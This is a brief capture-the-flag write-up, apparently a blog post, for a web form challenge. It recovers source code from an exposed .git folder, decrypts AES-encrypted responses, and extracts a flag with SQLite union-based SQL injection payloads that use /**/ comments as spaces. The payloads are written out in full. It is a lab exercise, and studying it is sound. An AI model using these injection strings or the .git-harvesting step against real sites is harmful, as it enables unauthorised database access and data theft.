In this challenge, we have a form.
Try input 1, we have a base64 string.
But we have nothing when decoding it, then I guess it is encrypted.
I tried dirsearch and found ‘.git’ :
Then, we use GitHack to get source code. In folder ‘form’, we found file AES.py
Now, we have key and iv, using it to decrypt the string:
Try SQL injection with:
1/**/or/**/1=1--
Therefore, I think that all the responses will be encrypted. Decrypt those strings, we have 5 country names: Vietnam, England, Japan, America, France.
Try to find database information, we found that it is SQLite version 3.27.2 with:
1/**/union/**/select/**/null,sqlite_version()--Now, we use:
1/**/union/**/select/**/null,name/**/from/**/sqlite_master/**/where/**/type='table'--
1/**/union/**/select/**/null,sql/**/from/**/sqlite_master/**/where/**/type='table'/**/and/**/tbl_name='form_flag'--We found a table named ‘form_flag‘ and a column named ‘flag‘. Use this payload to get the flag and decrypt it:
1/**/union/**/select/**/null,flag/**/from/**/form_flag--Flag: FUSEC{CSGO://Bomb_has_been_exploded_CT_loose}
By Dang Kien
No comments:
Post a Comment